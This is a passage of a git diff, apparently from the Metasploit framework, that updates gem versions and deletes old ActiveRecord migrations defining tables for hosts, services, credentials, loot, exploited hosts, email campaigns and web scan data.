data/sql/migrate/20110414180600_add_local_id_to_session_table.rb delete mode 100755 data/sql/migrate/20110415175705_add_routes_table.rb delete mode 100755 data/sql/migrate/20110422000000_convert_binary.rb delete mode 100755 data/sql/migrate/20110425095900_add_last_seen_to_sessions.rb delete mode 100755 data/sql/migrate/20110513143900_track_successful_exploits.rb delete mode 100755 data/sql/migrate/20110517160800_rename_and_prune_nessus_vulns.rb delete mode 100755 data/sql/migrate/20110527000000_add_task_id_to_reports_table.rb delete mode 100755 data/sql/migrate/20110527000001_add_api_keys_table.rb delete mode 100755 data/sql/migrate/20110606000001_add_macros_table.rb delete mode 100755 data/sql/migrate/20110610085000_move_old_imported_creds_to_new_files.rb delete mode 100755 data/sql/migrate/20110622000000_add_settings_to_tasks_table.rb delete mode 100755 data/sql/migrate/20110624000001_add_listeners_table.rb delete mode 100755 data/sql/migrate/20110625000001_add_macro_to_listeners_table.rb delete mode 100755 data/sql/migrate/20110630000001_add_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110630000002_add_name_to_nexpose_consoles_table.rb delete mode 100755 data/sql/migrate/20110717000001_add_profiles_table.rb delete mode 100755 data/sql/migrate/20110727163801_expand_cred_ptype_column.rb delete mode 100755 data/sql/migrate/20110730000001_add_initial_indexes.rb delete mode 100755 data/sql/migrate/20110812000001_prune_indexes.rb delete mode 100755 data/sql/migrate/20110922000000_expand_notes.rb delete mode 100755 data/sql/migrate/20110928101300_add_mod_ref_table.rb delete mode 100755 data/sql/migrate/20111011110000_add_display_name_to_reports_table.rb delete mode 100755 data/sql/migrate/20111203000000_inet_columns.rb delete mode 100755 data/sql/migrate/20111204000000_more_inet_columns.rb delete mode 100755 data/sql/migrate/20111210000000_add_scope_to_hosts.rb delete mode 100755 data/sql/migrate/20120126110000_add_virtual_host_to_hosts.rb delete mode 100755 data/sql/migrate/20120411173220_rename_workspace_members.rb delete mode 100755 data/sql/migrate/20120601152442_add_counter_caches_to_hosts.rb delete mode 100755 data/sql/migrate/20120625000000_add_vuln_details.rb delete mode 100755 data/sql/migrate/20120625000001_add_host_details.rb delete mode 100755 data/sql/migrate/20120625000002_expand_details.rb delete mode 100755 data/sql/migrate/20120625000003_expand_details2.rb delete mode 100755 data/sql/migrate/20120625000004_add_vuln_attempts.rb delete mode 100755 data/sql/migrate/20120625000005_add_vuln_and_host_counter_caches.rb delete mode 100755 data/sql/migrate/20120625000006_add_module_details.rb delete mode 100755 data/sql/migrate/20120625000007_add_exploit_attempts.rb delete mode 100755 data/sql/migrate/20120625000008_add_fail_message.rb delete mode 100644 data/sql/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb diff --git a/Gemfile b/Gemfile index 3d5f14fe4c..9513b0a497 100755 --- a/Gemfile +++ b/Gemfile @@ -7,7 +7,7 @@ gem 'activerecord' # Needed for some admin modules (scrutinizer_add_user.rb) gem 'json' # Database models shared between framework and Pro. -gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.4.0' +gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.5.1' # Needed by msfgui and other rpc components gem 'msgpack' # Needed by anemone crawler diff --git a/Gemfile.lock b/Gemfile.lock index c50df873bf..6ac57f60f6 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,9 +1,9 @@ GIT remote: git://github.com/rapid7/metasploit_data_models.git - revision: 448c1065329efea1eac76a3897f626f122666743 - tag: 0.4.0 + revision: a56276f8f6d1f2d532c03d2900537cadf94e1411 + tag: 0.5.1 specs: - metasploit_data_models (0.4.0) + metasploit_data_models (0.5.1) activerecord (>= 3.2.10) activesupport pg @@ -25,7 +25,7 @@ GEM multi_json (~> 1.0) arel (3.0.2) builder (3.0.4) - coderay (1.0.8) + coderay (1.0.9) diff-lcs (1.1.3) i18n (0.6.1) json (1.7.7) @@ -35,10 +35,10 @@ GEM nokogiri (1.5.6) pcaprub (0.11.3) pg (0.14.1) - pry (0.9.10) + pry (0.9.12) coderay (~> 1.0.5) method_source (~> 0.8) - slop (~> 3.3.1) + slop (~> 3.4) rake (10.0.2) redcarpet (2.2.2) robots (0.10.1) @@ -54,7 +54,7 @@ GEM multi_json (~> 1.0.3) simplecov-html (~> 0.5.3) simplecov-html (0.5.3) - slop (3.3.3) + slop (3.4.3) tzinfo (0.3.35) yard (0.8.3) diff --git a/data/sql/migrate/000_create_tables.rb b/data/sql/migrate/000_create_tables.rb deleted file mode 100755 index efda742476..0000000000 --- a/data/sql/migrate/000_create_tables.rb +++ /dev/null @@ -1,79 +0,0 @@ -class CreateTables < ActiveRecord::Migration - - def self.up - - create_table :hosts do |t| - t.timestamp :created - t.string :address, :limit => 16 # unique - t.string :address6 - t.string :mac - t.string :comm - t.string :name - t.string :state - t.string :info, :limit => 1024 - t.string :os_name - t.string :os_flavor - t.string :os_sp - t.string :os_lang - t.string :arch - end - - add_index :hosts, :address, :unique => true - - create_table :clients do |t| - t.integer :host_id - t.timestamp :created - t.string :ua_string, :limit => 1024, :null => false - t.string :ua_name, :limit => 64 - t.string :ua_ver, :limit => 32 - end - - create_table :services do |t| - t.integer :host_id - t.timestamp :created - t.integer :port, :null => false - t.string :proto, :limit => 16, :null => false - t.string :state - t.string :name - t.string :info, :limit => 1024 - end - - create_table :vulns do |t| - t.integer :host_id - t.integer :service_id - t.timestamp :created - t.string :name - t.text :data - end - - create_table :refs do |t| - t.integer :ref_id - t.timestamp :created - t.string :name, :limit => 512 - end - - create_table :vulns_refs, :id => false do |t| - t.integer :ref_id - t.integer :vuln_id - end - - create_table :notes do |t| - t.integer :host_id - t.timestamp :created - t.string :ntype, :limit => 512 - t.text :data - end - - end - - def self.down - drop_table :hosts - drop_table :clients - drop_table :services - drop_table :vulns - drop_table :refs - drop_table :vulns_refs - drop_table :notes - end - -end diff --git a/data/sql/migrate/001_add_wmap_tables.rb b/data/sql/migrate/001_add_wmap_tables.rb deleted file mode 100755 index e0d37098c2..0000000000 --- a/data/sql/migrate/001_add_wmap_tables.rb +++ /dev/null @@ -1,35 +0,0 @@ -class AddWmapTables < ActiveRecord::Migration - def self.up - create_table :wmap_targets do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.integer :selected - end - - create_table :wmap_requests do |t| - t.string :host # vhost - t.string :address, :limit => 16 # unique - t.string :address6 - t.integer :port - t.integer :ssl - t.string :meth, :limit => 32 - t.text :path - t.text :headers - t.text :query - t.text :body - t.string :respcode, :limit => 16 - t.text :resphead - t.text :response - t.timestamp :created - end - end - - def self.down - drop_table :wmap_targets - drop_table :wmap_requests - end -end - diff --git a/data/sql/migrate/002_add_workspaces.rb b/data/sql/migrate/002_add_workspaces.rb deleted file mode 100755 index 9afe792ef5..0000000000 --- a/data/sql/migrate/002_add_workspaces.rb +++ /dev/null @@ -1,36 +0,0 @@ -class AddWorkspaces < ActiveRecord::Migration - - def self.up - create_table :workspaces do |t| - t.string :name - t.timestamps - end - - change_table :hosts do |t| - t.integer :workspace_id, :required => true - end - - remove_index :hosts, :column => :address - - # - # This was broken after 018_add_workspace_user_info was introduced - # because of the new boundary column. For some reason, the - # find_or_create_by_name that .default eventually calls here tries to - # create a record with the boundary field that doesn't exist yet. - # See #1724 - # - #w = Msf::DBManager::Workspace.default - #Msf::DBManager::Host.update_all ["workspace_id = ?", w.id] - end - - def self.down - drop_table :workspaces - - change_table :hosts do |t| - t.remove :workspace_id - end - - add_index :hosts, :address, :unique => true - end - -end diff --git a/data/sql/migrate/003_move_notes.rb b/data/sql/migrate/003_move_notes.rb deleted file mode 100755 index 3aedba8e20..0000000000 --- a/data/sql/migrate/003_move_notes.rb +++ /dev/null @@ -1,20 +0,0 @@ -class MoveNotes < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :notes, :host_id - change_table :notes do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :service_id - t.integer :host_id - end - end - - def self.down - remove_column :notes, :workspace_id - remove_column :notes, :service_id - change_table :notes do |t| - t.integer :host_id, :null => false - end - end -end - diff --git a/data/sql/migrate/004_add_events_table.rb b/data/sql/migrate/004_add_events_table.rb deleted file mode 100755 index a89d75281e..0000000000 --- a/data/sql/migrate/004_add_events_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddEventsTable < ActiveRecord::Migration - def self.up - create_table :events do |t| - t.integer :workspace_id - t.integer :host_id - t.timestamp :created_at - t.string :user - t.string :name - t.string :info - end - end - def self.down - drop_table :events - end -end - diff --git a/data/sql/migrate/005_expand_info.rb b/data/sql/migrate/005_expand_info.rb deleted file mode 100755 index bd34021e11..0000000000 --- a/data/sql/migrate/005_expand_info.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 4096 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 1024 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 1024 - end - - remove_column :vulns, :data - change_table :hosts do |t| - t.string :data, :limit => 1024 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 1024 - end - - end -end - diff --git a/data/sql/migrate/006_add_timestamps.rb b/data/sql/migrate/006_add_timestamps.rb deleted file mode 100755 index 446a83aa29..0000000000 --- a/data/sql/migrate/006_add_timestamps.rb +++ /dev/null @@ -1,26 +0,0 @@ - -# Adds 'created_at' and 'updated_at' columns to every primary table. -# -class AddTimestamps < ActiveRecord::Migration - - @@TABLES_NEEDING_RENAME = [:clients, :hosts, :notes, :refs, :services, :vulns, :wmap_requests] - @@TABLES_NEEDING_CREATED_AT = [:wmap_targets] - @@TABLES_NEEDING_UPDATED_AT = [:clients, :events, :hosts, :notes, :refs, :services, :vulns, :wmap_requests, :wmap_targets] - - def self.up - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created, :created_at } - - @@TABLES_NEEDING_CREATED_AT.each { |t| add_column t, :created_at, :datetime } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| add_column t, :updated_at, :datetime } - end - - def self.down - @@TABLES_NEEDING_RENAME.each { |t| rename_column t, :created_at, :created } - - @@TABLES_NEEDING_CREATED_AT.each { |t| remove_column t, :created_at } - - @@TABLES_NEEDING_UPDATED_AT.each { |t| remove_column t, :updated_at } - end -end - diff --git a/data/sql/migrate/007_add_loots.rb b/data/sql/migrate/007_add_loots.rb deleted file mode 100755 index 32786f8cfb..0000000000 --- a/data/sql/migrate/007_add_loots.rb +++ /dev/null @@ -1,20 +0,0 @@ -class AddLoots < ActiveRecord::Migration - - def self.up - create_table :loots do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.integer :host_id - t.integer :service_id - t.string :ltype, :limit => 512 - t.string :path, :limit => 1024 - t.text :data - t.timestamps - end - end - - def self.down - drop_table :loots - end - -end - diff --git a/data/sql/migrate/008_create_users.rb b/data/sql/migrate/008_create_users.rb deleted file mode 100755 index 4cc32cc6e4..0000000000 --- a/data/sql/migrate/008_create_users.rb +++ /dev/null @@ -1,16 +0,0 @@ -class CreateUsers < ActiveRecord::Migration - def self.up - create_table :users do |t| - t.string :username - t.string :crypted_password - t.string :password_salt - t.string :persistence_token - - t.timestamps - end - end - - def self.down - drop_table :users - end -end diff --git a/data/sql/migrate/009_add_loots_ctype.rb b/data/sql/migrate/009_add_loots_ctype.rb deleted file mode 100755 index 0aad1366fb..0000000000 --- a/data/sql/migrate/009_add_loots_ctype.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddLootsCtype < ActiveRecord::Migration - def self.up - add_column :loots, :content_type, :string - end - - def self.down - remove_column :loots, :content_type - end -end - diff --git a/data/sql/migrate/010_add_alert_fields.rb b/data/sql/migrate/010_add_alert_fields.rb deleted file mode 100755 index f99dd68d32..0000000000 --- a/data/sql/migrate/010_add_alert_fields.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddAlertFields < ActiveRecord::Migration - def self.up - add_column :notes, :critical, :boolean - add_column :notes, :seen, :boolean - add_column :events, :critical, :boolean - add_column :events, :seen, :boolean - end - - def self.down - remove_column :notes, :critical - remove_column :notes, :seen - remove_column :events, :critical - remove_column :events, :seen - end -end - diff --git a/data/sql/migrate/011_add_reports.rb b/data/sql/migrate/011_add_reports.rb deleted file mode 100755 index 2f16e8b70d..0000000000 --- a/data/sql/migrate/011_add_reports.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddReports < ActiveRecord::Migration - - def self.up - create_table :reports do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :rtype - t.string :path, :limit => 1024 - t.text :options - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/012_add_tasks.rb b/data/sql/migrate/012_add_tasks.rb deleted file mode 100755 index 39004c821e..0000000000 --- a/data/sql/migrate/012_add_tasks.rb +++ /dev/null @@ -1,24 +0,0 @@ -class AddTasks < ActiveRecord::Migration - - def self.up - create_table :tasks do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :module - t.datetime :completed_at - t.string :path, :limit => 1024 - t.string :info - t.string :description - t.integer :progress - t.text :options - t.text :error - t.timestamps - end - end - - def self.down - drop_table :tasks - end - -end - diff --git a/data/sql/migrate/013_add_tasks_result.rb b/data/sql/migrate/013_add_tasks_result.rb deleted file mode 100755 index bf01c7afb8..0000000000 --- a/data/sql/migrate/013_add_tasks_result.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddTasksResult < ActiveRecord::Migration - def self.up - add_column :tasks, :result, :text - end - - def self.down - remove_column :tasks, :result - end -end - diff --git a/data/sql/migrate/014_add_loots_fields.rb b/data/sql/migrate/014_add_loots_fields.rb deleted file mode 100755 index 616d8c96be..0000000000 --- a/data/sql/migrate/014_add_loots_fields.rb +++ /dev/null @@ -1,12 +0,0 @@ -class AddLootsFields < ActiveRecord::Migration - def self.up - add_column :loots, :name, :text - add_column :loots, :info, :text - end - - def self.down - remove_column :loots, :name - remove_column :loots, :info - end -end - diff --git a/data/sql/migrate/015_rename_user.rb b/data/sql/migrate/015_rename_user.rb deleted file mode 100755 index 7934a0f423..0000000000 --- a/data/sql/migrate/015_rename_user.rb +++ /dev/null @@ -1,16 +0,0 @@ -class RenameUser < ActiveRecord::Migration - def self.up - remove_column :events, :user - change_table :events do |t| - t.string :username - end - end - - def self.down - remove_column :events, :username - change_table :events do |t| - t.string :user - end - end -end - diff --git a/data/sql/migrate/016_add_host_purpose.rb b/data/sql/migrate/016_add_host_purpose.rb deleted file mode 100755 index 1e2827801e..0000000000 --- a/data/sql/migrate/016_add_host_purpose.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddHostPurpose < ActiveRecord::Migration - def self.up - add_column :hosts, :purpose, :text - end - - def self.down - remove_column :hosts, :purpose - end -end - diff --git a/data/sql/migrate/017_expand_info2.rb b/data/sql/migrate/017_expand_info2.rb deleted file mode 100755 index cee6fd8d3b..0000000000 --- a/data/sql/migrate/017_expand_info2.rb +++ /dev/null @@ -1,58 +0,0 @@ -class ExpandInfo2 < ActiveRecord::Migration - def self.up - remove_column :events, :info - change_table :events do |t| - t.string :info, :limit => 65536 - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 65536 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 65536 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 65536 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - - remove_column :events, :info - change_table :events do |t| - t.string :info - end - - remove_column :notes, :data - change_table :notes do |t| - t.string :data, :limit => 4096 - end - - remove_column :hosts, :info - change_table :hosts do |t| - t.string :info, :limit => 4096 - end - - remove_column :vulns, :data - change_table :vulns do |t| - t.string :data, :limit => 4096 - end - - remove_column :services, :info - change_table :services do |t| - t.string :info, :limit => 4096 - end - - end -end - diff --git a/data/sql/migrate/018_add_workspace_user_info.rb b/data/sql/migrate/018_add_workspace_user_info.rb deleted file mode 100755 index fb5e101fc3..0000000000 --- a/data/sql/migrate/018_add_workspace_user_info.rb +++ /dev/null @@ -1,29 +0,0 @@ -class AddWorkspaceUserInfo < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :boundary, :limit => 4096 - end - - change_table :users do |t| - t.string :fullname - t.string :email - t.string :phone - t.string :company - end - end - - def self.down - change_table :workspaces do |t| - t.remove :boundary - end - - change_table :users do |t| - t.remove :fullname - t.remove :email - t.remove :phone - t.remove :company - end - end - -end - diff --git a/data/sql/migrate/019_add_workspace_desc.rb b/data/sql/migrate/019_add_workspace_desc.rb deleted file mode 100755 index 0dc31f0c61..0000000000 --- a/data/sql/migrate/019_add_workspace_desc.rb +++ /dev/null @@ -1,23 +0,0 @@ -class AddWorkspaceDesc < ActiveRecord::Migration - def self.up - change_table :workspaces do |t| - t.string :description, :limit => 4096 - end - - change_table :hosts do |t| - t.string :comments, :limit => 4096 - end - end - - def self.down - change_table :workspaces do |t| - t.remove :description - end - - change_table :hosts do |t| - t.remove :comments - end - end - -end - diff --git a/data/sql/migrate/020_add_user_preferences.rb b/data/sql/migrate/020_add_user_preferences.rb deleted file mode 100755 index 40b472701c..0000000000 --- a/data/sql/migrate/020_add_user_preferences.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddUserPreferences < ActiveRecord::Migration - def self.up - add_column :users, :prefs, :string, :limit => 524288 - end - - def self.down - remove_column :users, :prefs - end - -end - diff --git a/data/sql/migrate/021_standardize_info_and_data.rb b/data/sql/migrate/021_standardize_info_and_data.rb deleted file mode 100755 index bb9a2bccd6..0000000000 --- a/data/sql/migrate/021_standardize_info_and_data.rb +++ /dev/null @@ -1,18 +0,0 @@ -class StandardizeInfoAndData < ActiveRecord::Migration - def self.up - # Remove the host requirement. We'll add the column back in below. - remove_column :vulns, :data - change_table :vulns do |t| - t.string :info, :limit => 65536 - end - end - - def self.down - remove_column :vulns, :info - change_table :notes do |t| - t.string :data, :limit => 65536 - - end - end -end - diff --git a/data/sql/migrate/022_enlarge_event_info.rb b/data/sql/migrate/022_enlarge_event_info.rb deleted file mode 100755 index fec9698c06..0000000000 --- a/data/sql/migrate/022_enlarge_event_info.rb +++ /dev/null @@ -1,10 +0,0 @@ -class EnlargeEventInfo < ActiveRecord::Migration - def self.up - change_column :events, :info, :text - end - - def self.down - change_column :events, :info, :string, :limit => 65535 - end -end - diff --git a/data/sql/migrate/023_add_report_downloaded_at.rb b/data/sql/migrate/023_add_report_downloaded_at.rb deleted file mode 100755 index 7ec5716e82..0000000000 --- a/data/sql/migrate/023_add_report_downloaded_at.rb +++ /dev/null @@ -1,10 +0,0 @@ -class AddReportDownloadedAt < ActiveRecord::Migration - def self.up - add_column :reports, :downloaded_at, :timestamp - end - - def self.down - remove_column :reports, :downloaded_at - end -end - diff --git a/data/sql/migrate/024_convert_service_info_to_text.rb b/data/sql/migrate/024_convert_service_info_to_text.rb deleted file mode 100755 index 14f0a96222..0000000000 --- a/data/sql/migrate/024_convert_service_info_to_text.rb +++ /dev/null @@ -1,12 +0,0 @@ -class ConvertServiceInfoToText < ActiveRecord::Migration - - def self.up - change_column :services, :info, :text - end - - def self.down - change_column :services, :info, :string, :limit => 65536 - end - -end - diff --git a/data/sql/migrate/025_add_user_admin.rb b/data/sql/migrate/025_add_user_admin.rb deleted file mode 100755 index d077dbd633..0000000000 --- a/data/sql/migrate/025_add_user_admin.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddUserAdmin < ActiveRecord::Migration - - # Add user admin flag and project member list. - def self.up - add_column :users, :admin, :boolean, :default => true - - create_table :project_members, :id => false do |t| - t.integer :workspace_id, :null => false - t.integer :user_id, :null => false - end - end - - def self.down - remove_column :users, :admin - - drop_table :project_members - end -end - diff --git a/data/sql/migrate/026_add_creds_table.rb b/data/sql/migrate/026_add_creds_table.rb deleted file mode 100755 index 381ec8373a..0000000000 --- a/data/sql/migrate/026_add_creds_table.rb +++ /dev/null @@ -1,19 +0,0 @@ -class AddCredsTable < ActiveRecord::Migration - def self.up - create_table :creds do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :user, :limit => 2048 - t.string :pass, :limit => 4096 - t.boolean :active, :default => true - t.string :proof, :limit => 4096 - t.string :ptype, :limit => 16 - t.integer :source_id - t.string :source_type - end - end - def self.down - drop_table :creds - end -end - diff --git a/data/sql/migrate/20100819123300_migrate_cred_data.rb b/data/sql/migrate/20100819123300_migrate_cred_data.rb deleted file mode 100755 index d752c270f4..0000000000 --- a/data/sql/migrate/20100819123300_migrate_cred_data.rb +++ /dev/null @@ -1,154 +0,0 @@ -class MigrateCredData < ActiveRecord::Migration - - def self.up - begin # Wrap the whole thing in a giant rescue. - skipped_notes = [] - new_creds = [] - Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - service_name = $1 - if !service_name - skipped_notes << note - next - end - if note.host and note.host.respond_to?(:address) - if note.service - svc_id = note.service.id - else - candidate_services = [] - note.host.services.each do |service| - if service.name == service_name - candidate_services << service - end - end - # Use the default port, or the first port that matches the protocol name. - default_port = case service_name.downcase - when 'ftp'; 21 - when /^smb/; 445 - when /^imap/; 143 - when 'telnet'; 23 - when 'pop3'; 110 - when 'http','domino','axis','wordpress','tomcat'; 80 - when 'tns'; 1521 - when 'snmp'; 161 - when 'mssql'; 1433 - when 'ssh'; 22 - when 'https'; 443 - when 'mysql'; 3306 - when 'db2'; 50000 - when 'postgres'; 5432 - else nil - end - if !default_port - skipped_notes << note - next - end - if candidate_services.size == 1 - svc_id = candidate_services.first.id - elsif candidate_services.empty? - Mdm::Service.new do |svc| - svc.host_id = note.host.id - svc.port = default_port - svc.proto = 'tcp' - svc.state = 'open' - svc.name = service_name.downcase - svc.save! - svc_id = svc.id - end - elsif candidate_services.size > 1 - svc_ports = candidate_services.map{|s| s.port} - if svc_ports.index(default_port) - svc_id = candidate_services[svc_ports.index(default_port)].id - else - svc_id = candidate_services.first.id - end - end - end - else - skipped_notes << note - next - end - if note.data[:hash] - ptype = 'smb_hash' - pass = note.data[:hash] - elsif note.data[:ssh_key] - ptype = 'ssh_key' - pass = note.data[:extra] - else - ptype = 'password' - pass = note.data[:pass] - end - # Format domains and databases into the usernames. - if note.ntype == "auth.smb_challenge" - domain = note.data[:extra].match(/DOMAIN=([^\s]+)/)[1] - if domain - user = [domain, note.data[:user]].join("/") - else - user = note.data[:user] - end - elsif note.ntype =~ /auth\.(postgres|db2)/ - if note.data[:database] - user = [note.data[:database], note.data[:user]].join("/") - else - user = note.data[:user] - end - else - user = note.data[:user] - end - # Not actually a credentials, convert to migrated notes - if service_name == 'smb' && note.data[:token] - skipped_notes << note - next - end - if service_name == 'tns' && note.data[:type] == "bruteforced_sid" - skipped_notes << note - next - end - # Special case for the bizarre reporting for aux/admin/oracle/oracle_login - if service_name == 'tns' && note.data[:type] == "bruteforced_account" - note.data[:data] =~ /([^\x2f]+)\x2f([^\s]+).*with sid (.*)/ - user = "#{$3}/#{$1}" - pass = $2 - end - new_creds << [svc_id, ptype, user, pass] - end - - say "Migrating #{new_creds.size} credentials." - new_creds.uniq.each do |note| - Mdm::Cred.new do |cred| - cred.service_id = note[0] - cred.user = note[2] - cred.pass = note[3] - cred.ptype = note[1] - cred.save! - end - end - - say "Migrating #{skipped_notes.size} notes." - skipped_notes.uniq.each do |note| - Mdm::Note.new do |new_note| - new_note.host_id = note.host_id - new_note.ntype = "migrated_auth" - new_note.data = note.data.merge(:migrated_auth_type => note.ntype) - new_note.save! - end - end - - say "Deleting migrated auth notes." - Mdm::Note.find(:all).each do |note| - next unless note.ntype[/^auth\.(.*)/] - note.delete - end - rescue - say "There was a problem migrating auth credentials. Skipping." - return true # Never fail! - end - end - - - def self.down - raise ActiveRecord::IrreversibleMigration - end - -end - diff --git a/data/sql/migrate/20100824151500_add_exploited_table.rb b/data/sql/migrate/20100824151500_add_exploited_table.rb deleted file mode 100755 index b7897d3832..0000000000 --- a/data/sql/migrate/20100824151500_add_exploited_table.rb +++ /dev/null @@ -1,16 +0,0 @@ -class AddExploitedTable < ActiveRecord::Migration - def self.up - create_table :exploited_hosts do |t| - t.integer :host_id, :null => false - t.integer :service_id - t.string :session_uuid, :limit => 8 - t.string :name, :limit => 2048 - t.string :payload, :limit => 2048 - t.timestamps - end - end - def self.down - drop_table :exploited_hosts - end -end - diff --git a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb b/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb deleted file mode 100755 index c136d4b9d7..0000000000 --- a/data/sql/migrate/20100908001428_add_owner_to_workspaces.rb +++ /dev/null @@ -1,9 +0,0 @@ -class AddOwnerToWorkspaces < ActiveRecord::Migration - def self.up - add_column :workspaces, :owner_id, :integer - end - - def self.down - remove_column :workspaces, :owner_id - end -end diff --git a/data/sql/migrate/20100911122000_add_report_templates.rb b/data/sql/migrate/20100911122000_add_report_templates.rb deleted file mode 100755 index 08b06d4c5f..0000000000 --- a/data/sql/migrate/20100911122000_add_report_templates.rb +++ /dev/null @@ -1,18 +0,0 @@ -class AddReportTemplates < ActiveRecord::Migration - - def self.up - create_table :report_templates do |t| - t.integer :workspace_id, :null => false, :default => 1 - t.string :created_by - t.string :path, :limit => 1024 - t.text :name - t.timestamps - end - end - - def self.down - drop_table :reports - end - -end - diff --git a/data/sql/migrate/20100916151530_require_admin_flag.rb b/data/sql/migrate/20100916151530_require_admin_flag.rb deleted file mode 100755 index d73e18425d..0000000000 --- a/data/sql/migrate/20100916151530_require_admin_flag.rb +++ /dev/null @@ -1,15 +0,0 @@ -class RequireAdminFlag < ActiveRecord::Migration - - # Make the admin flag required. - def self.up - # update any existing records - Mdm::User.update_all({:admin => true}, {:admin => nil}) - - change_column :users, :admin, :boolean, :null => false, :default => true - end - - def self.down - change_column :users, :admin, :boolean, :default => true - end - -end diff --git a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb b/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb deleted file mode 100755 index 433bdcf65f..0000000000 --- a/data/sql/migrate/20100916175000_add_campaigns_and_templates.rb +++ /dev/null @@ -1,61 +0,0 @@ - -class AddCampaignsAndTemplates < ActiveRecord::Migration - - def self.up - create_table :campaigns do |t| - t.integer :workspace_id, :null => false - t.string :name, :limit => 512 - # Serialized, stores SMTP/other protocol config options etc. - t.text :prefs - t.integer :status, :default => 0 - t.timestamp :started_at - t.timestamps - end - - create_table :email_templates do |t| - t.string :name, :limit => 512 - t.string :subject, :limit => 1024 - t.text :body - t.integer :parent_id - t.integer :campaign_id - end - create_table :attachments do |t| - t.string :name, :limit => 512 - t.binary :data - t.string :content_type, :limit => 512 - t.boolean :inline, :null => false, :default => true - t.boolean :zip, :null => false, :default => false - end - create_table :attachments_email_templates, :id => false do |t| - t.integer :attachment_id - t.integer :email_template_id - end - - create_table :email_addresses do |t| - t.integer :campaign_id, :null => false - t.string :first_name, :limit => 512 - t.string :last_name, :limit => 512 - t.string :address, :limit => 512 - t.boolean :sent, :null => false, :default => false - t.timestamp :clicked_at - end - - create_table :web_templates do |t| - t.string :name, :limit => 512 - t.string :title, :limit => 512 - t.string :body, :limit => 524288 - t.integer :campaign_id - end - end - - def self.down - drop_table :campaigns - drop_table :email_templates - drop_table :attachments - drop_table :attachments_email_templates - drop_table :email_addresses - drop_table :web_templates - end - -end - diff --git a/data/sql/migrate/20100920012100_add_generate_exe_column.rb b/data/sql/migrate/20100920012100_add_generate_exe_column.rb deleted file mode 100755 index 7b055b268f..0000000000 --- a/data/sql/migrate/20100920012100_add_generate_exe_column.rb +++ /dev/null @@ -1,8 +0,0 @@ -class AddGenerateExeColumn < ActiveRecord::Migration - def self.up - add_column :email_templates, :generate_exe, :boolean, :null => false, :default => false - end - def self.down - remove_column :email_templates, :generate_exe - end -end diff --git a/data/sql/migrate/20100926214000_add_template_prefs.rb b/data/sql/migrate/20100926214000_add_template_prefs.rb deleted file mode 100755 index 70b84d0734..0000000000 --- a/data/sql/migrate/20100926214000_add_template_prefs.rb +++ /dev/null @@ -1,11 +0,0 @@ -class AddTemplatePrefs < ActiveRecord::Migration - def self.up - remove_column :email_templates, :generate_exe - add_column :email_templates, :prefs, :text - add_column :web_templates, :prefs, :text - end - def self.down - remove_column :email_templates, :prefs - remove_column :web_templates, :prefs - end -end diff --git a/data/sql/migrate/20101001000000_add_web_tables.rb b/data/sql/migrate/20101001000000_add_web_tables.rb deleted file mode 100755 index e55bf286b5..0000000000 --- a/data/sql/migrate/20101001000000_add_web_tables.rb +++ /dev/null @@ -1,57 +0,0 @@ -class AddWebTables < ActiveRecord::Migration - - def self.up - create_table :web_sites do |t| - t.integer :service_id, :null => false - t.timestamps - t.string :vhost, :limit => 2048 - t.text :comments - t.text :options - end - - create_table :web_pages do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.text :query - t.integer :code, :null => false - t.text :cookie - t.text :auth - t.text :ctype - t.timestamp :mtime - t.text :location - t.text :body - t.text :headers - end - - create_table :web_forms do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - end - - create_table :web_vulns do |t| - t.integer :web_site_id, :null => false - t.timestamps - t.text :path - t.string :method, :limit => 1024 - t.text :params - t.text 